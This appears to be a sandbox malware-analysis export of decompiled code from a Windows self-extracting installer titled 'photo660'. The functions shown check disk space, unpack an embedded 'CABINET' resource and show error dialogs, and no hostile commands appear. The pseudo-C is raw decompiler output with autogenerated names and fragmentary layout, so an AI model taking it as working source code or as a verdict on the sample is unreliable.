                                                                                                                                                                                                        control_flow_graph 324 21597d-2159b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 2159bb-2159d8 call 2144b9 call 216285 324->325 326 2159dd-215a1b GetDiskFreeSpaceA 324->326 341 215c05-215c14 call 216ce0 325->341 328 215ba1-215bde memset call 216285 GetLastError FormatMessageA 326->328 329 215a21-215a4a MulDiv 326->329 338 215be3-215bfc call 2144b9 SetCurrentDirectoryA 328->338 329->328 332 215a50-215a6c GetVolumeInformationA 329->332 335 215ab5-215aca SetCurrentDirectoryA 332->335 336 215a6e-215ab0 memset call 216285 GetLastError FormatMessageA 332->336 340 215acc-215ad1 335->340 336->338 353 215c02 338->353 344 215ad3-215ad8 340->344 345 215ae2-215ae4 340->345 344->345 346 215ada-215ae0 344->346 348 215ae7-215af8 345->348 349 215ae6 345->349 346->340 346->345 352 215af9-215afb 348->352 349->348 354 215b05-215b08 352->354 355 215afd-215b03 352->355 356 215c04 353->356 357 215b20-215b27 354->357 358 215b0a-215b1b call 2144b9 354->358 355->352 355->354 356->341 360 215b52-215b5b 357->360 361 215b29-215b33 357->361 358->353 364 215b62-215b6d 360->364 361->360 363 215b35-215b50 361->363 363->364 365 215b76-215b7d 364->365 366 215b6f-215b74 364->366 368 215b83 365->368 369 215b7f-215b81 365->369 367 215b85 366->367 370 215b87-215b94 call 21268b 367->370 371 215b96-215b9f 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E0021597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
	signed int _v8;
	char _v16;
	char _v276;
	char _v788;
	long _v792;
	long _v796;
	long _v800;
	signed int _v804;
	long _v808;
	int _v812;
	long _v816;
	long _v820;
	void* __ebx;
	void* __esi;
	signed int _t46;
	int _t50;
	signed int _t55;
	void* _t66;
	int _t69;
	signed int _t73;
	signed short _t78;
	signed int _t87;
	signed int _t101;
	int _t102;
	unsigned int _t103;
	unsigned int _t105;
	signed int _t111;
	long _t112;
	signed int _t116;
	CHAR* _t118;
	signed int _t119;
	signed int _t120;

	_t114 = __edi;
	_t46 =  *0x218004; // 0x58ac7c6d
	_v8 = _t46 ^ _t120;
	_v804 = __edx;
	_t118 = __ecx;
	GetCurrentDirectoryA(0x104,  &_v276);
	_t50 = SetCurrentDirectoryA(_t118); // executed
	if(_t50 != 0) {
		_push(__edi);
		_v796 = 0;
		_v792 = 0;
		_v800 = 0;
		_v808 = 0;
		_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
		__eflags = _t55;
		if(_t55 == 0) {
			L29:
			memset( &_v788, 0, 0x200);
			 *0x219124 = E00216285();
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
			_t110 = 0x4b0;
			L30:
			__eflags = 0;
			E002144B9(0, _t110, _t118,  &_v788, 0x10, 0);
			SetCurrentDirectoryA( &_v276);
			L31:
			_t66 = 0;
			__eflags = 0;
			L32:
			_pop(_t114);
			goto L33;
		}
		_t69 = _v792 * _v796;
		_v812 = _t69;
		_t116 = MulDiv(_t69, _v800, 0x400);
		__eflags = _t116;
		if(_t116 == 0) {
			goto L29;
		}
		_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
		__eflags = _t73;
		if(_t73 != 0) {
			SetCurrentDirectoryA( &_v276); // executed
			_t101 =  &_v16;
			_t111 = 6;
			_t119 = _t118 - _t101;
			__eflags = _t119;
			while(1) {
				_t22 = _t111 - 4; // 0x2
				__eflags = _t22;
				if(_t22 == 0) {
					break;
				}
				_t87 =  *((intOrPtr*)(_t119 + _t101));
				__eflags = _t87;
				if(_t87 == 0) {
					break;
				}
				 *_t101 = _t87;
				_t101 = _t101 + 1;
				_t111 = _t111 - 1;
				__eflags = _t111;
				if(_t111 != 0) {
					continue;
				}
				break;
			}
			__eflags = _t111;
			if(_t111 == 0) {
				_t101 = _t101 - 1;
				__eflags = _t101;
			}
			 *_t101 = 0;
			_t112 = 0x200;
			_t102 = _v812;
			_t78 = 0;
			_t118 = 8;
			while(1) {
				__eflags = _t102 - _t112;
				if(_t102 == _t112) {
					break;
				}
				_t112 = _t112 + _t112;
				_t78 = _t78 + 1;
				__eflags = _t78 - _t118;
				if(_t78 < _t118) {
					continue;
				}
				break;
			}
			__eflags = _t78 - _t118;
			if(_t78 != _t118) {
				__eflags =  *0x219a34 & 0x00000008;
				if(( *0x219a34 & 0x00000008) == 0) {
					L20:
					_t103 =  *0x219a38; // 0x0
					_t110 =  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4));
					L21:
					__eflags = (_v804 & 0x00000003) - 3;
					if((_v804 & 0x00000003) != 3) {
						__eflags = _v804 & 0x00000001;
						if((_v804 & 0x00000001) == 0) {
							__eflags = _t103 - _t116;
						} else {
							__eflags = _t110 - _t116;
						}
					} else {
						__eflags = _t103 + _t110 - _t116;
					}
					if(__eflags <= 0) {
						 *0x219124 = 0;
						_t66 = 1;
					} else {
						_t66 = E0021268B(_a4, _t110, _t103,  &_v16);
					}
					goto L32;
				}
				__eflags = _v816 & 0x00008000;
				if((_v816 & 0x00008000) == 0) {
					goto L20;
				}
				_t105 =  *0x219a38; // 0x0
				_t110 =  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x2189e0 + (_t78 & 0x0000ffff) * 4));
				_t103 = (_t105 >> 2) +  *0x219a38;
				goto L21;
			}
			_t110 = 0x4c5;
			E002144B9(0, 0x4c5, 0, 0, 0x10, 0);
			goto L31;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        					_t110 = 0x4f9;
                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t110 = 0x4bc;
                                                                                                                                                                                                        					E002144B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					_t66 = 0;
                                                                                                                                                                                                        					L33:
                                                                                                                                                                                                        					return E00216CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x002159c0
                                                                                                                                                                                                        0x002159c7
                                                                                                                                                                                                        0x002159d1
                                                                                                                                                                                                        0x002159d6
                                                                                                                                                                                                        0x00215c05
                                                                                                                                                                                                        0x00215c14
                                                                                                                                                                                                        0x00215c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 002159A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 002159AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00215A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00215A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00215A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00215A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00215A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00215AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00215BFC
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: f4169074bb7180219b0cd8b376604ff085925891f9d7163b8139d0fe04409f82
                                                                                                                                                                                                        • Instruction ID: 149a8919a429764c213d0577bd8ebdc98eeddccc94d49470ef02b4e5557231f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4169074bb7180219b0cd8b376604ff085925891f9d7163b8139d0fe04409f82
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6871A0B1921219AFEB259F20DC89BFB77ECEBA8344F1440AAF40592140DA309FD48F60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 374 214fe0-21501a call 21468f FindResourceA LoadResource LockResource 377 215161-215163 374->377 378 215020-215027 374->378 379 215057-21505e call 214efd 378->379 380 215029-215051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 215060-215077 call 2144b9 379->383 384 21507c-2150b4 379->384 380->379 388 215107-21510e 383->388 389 2150b6-2150da 384->389 390 2150e8-215104 call 2144b9 384->390 392 215110-215117 FreeResource 388->392 393 21511d-21511f 388->393 398 215106 389->398 399 2150dc 389->399 390->398 392->393 395 215121-215127 393->395 396 21513a-215141 393->396 395->396 400 215129-215135 call 2144b9 395->400 401 215143-21514a 396->401 402 21515f 396->402 398->388 405 2150e3-2150e6 399->405 400->396 401->402 404 21514c-215159 SendMessageA 401->404 402->377 404->402 405->390 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00214FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
                                                                                                                                                                                                        				 *0x219144 = E0021468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0x219140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0x218584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0x218584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E00214EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E00214CA0, E00214CC0, E00214980, E00214A50, E00214AD0, E00214B60, E00214BC0, 1, 0x219148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0x219148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0x218584; // 0x0
                                                                                                                                                                                                        						E002144B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0x211140, 0, E00214CD0, 0, 0x219140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0x218584; // 0x0
                                                                                                                                                                                                        					E002144B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0x219140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0x219140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0x2191d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E002144B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0x218a38 & 0x00000001) == 0 && ( *0x219a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0x218584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00214FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00215006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 0021500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00215030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00215037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 0021504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00215051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00215111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00215159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 2c01b5866eccea746b4c535ad42d30eeb632f63de83a61906adfd41c1d5c0b0c
                                                                                                                                                                                                        • Instruction ID: 1fb1de70226acbdcef7a2e140a5a8f35d253b540003982370583c5441087e4fc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c01b5866eccea746b4c535ad42d30eeb632f63de83a61906adfd41c1d5c0b0c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 463119B0651312BBD7206B61BDCEFE736DCAB7A754F008024B90DA2191CFB48CE08650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 2144b9-2144f8 407 214679-21467b 406->407 408 2144fe-214525 LoadStringA 406->408 411 21467c-21468c call 216ce0 407->411 409 214562-214568 408->409 410 214527-21452e call 21681f 408->410 412 21456b-214570 409->412 420 214530-21453d call 2167c9 410->420 421 21453f 410->421 412->412 416 214572-21457c 412->416 418 2145c9-2145cb 416->418 419 21457e-214580 416->419 424 214607-214617 LocalAlloc 418->424 425 2145cd-2145cf 418->425 422 214583-214588 419->422 420->421 426 214544-214554 MessageBoxA 420->426 421->426 422->422 429 21458a-21458c 422->429 427 21455a-21455d 424->427 428 21461d-214628 call 211680 424->428 431 2145d2-2145d7 425->431 426->427 427->411 435 21462d-21463d MessageBeep call 21681f 428->435 433 21458f-214594 429->433 431->431 434 2145d9-2145ed LocalAlloc 431->434 433->433 436 214596-2145ad LocalAlloc 433->436 434->427 437 2145f3-214605 call 21171e 434->437 444 21463f-21464c call 2167c9 435->444 445 21464e 435->445 436->427 440 2145af-2145c7 call 21171e 436->440 437->435 440->435 444->445 448 214653-214677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E002144B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0x218a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0x219a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00211680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E0021171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E0021171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E0021681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E002167C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E0021681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E002167C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x002145db
                                                                                                                                                                                                        0x002145de
                                                                                                                                                                                                        0x002145e3
                                                                                                                                                                                                        0x002145e9
                                                                                                                                                                                                        0x002145ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002145f3
                                                                                                                                                                                                        0x002145fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214602
                                                                                                                                                                                                        0x002145ed
                                                                                                                                                                                                        0x0021457e
                                                                                                                                                                                                        0x0021457e
                                                                                                                                                                                                        0x00214580
                                                                                                                                                                                                        0x00214580
                                                                                                                                                                                                        0x00214583
                                                                                                                                                                                                        0x00214583
                                                                                                                                                                                                        0x00214585
                                                                                                                                                                                                        0x00214586
                                                                                                                                                                                                        0x0021458a
                                                                                                                                                                                                        0x0021458c
                                                                                                                                                                                                        0x0021458f
                                                                                                                                                                                                        0x0021458f
                                                                                                                                                                                                        0x00214591
                                                                                                                                                                                                        0x00214592
                                                                                                                                                                                                        0x0021459b
                                                                                                                                                                                                        0x0021459e
                                                                                                                                                                                                        0x002145a3
                                                                                                                                                                                                        0x002145a9
                                                                                                                                                                                                        0x002145ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002145af
                                                                                                                                                                                                        0x002145af
                                                                                                                                                                                                        0x002145bf
                                                                                                                                                                                                        0x0021462d
                                                                                                                                                                                                        0x00214630
                                                                                                                                                                                                        0x0021463d
                                                                                                                                                                                                        0x0021464e
                                                                                                                                                                                                        0x0021464e
                                                                                                                                                                                                        0x0021463f
                                                                                                                                                                                                        0x00214640
                                                                                                                                                                                                        0x00214647
                                                                                                                                                                                                        0x0021464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021464c
                                                                                                                                                                                                        0x00214666
                                                                                                                                                                                                        0x0021466d
                                                                                                                                                                                                        0x0021466f
                                                                                                                                                                                                        0x00214675
                                                                                                                                                                                                        0x00214675
                                                                                                                                                                                                        0x002145ad
                                                                                                                                                                                                        0x00214527
                                                                                                                                                                                                        0x0021452e
                                                                                                                                                                                                        0x0021453f
                                                                                                                                                                                                        0x0021453f
                                                                                                                                                                                                        0x00214530
                                                                                                                                                                                                        0x00214531
                                                                                                                                                                                                        0x00214538
                                                                                                                                                                                                        0x0021453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021453d
                                                                                                                                                                                                        0x00214554
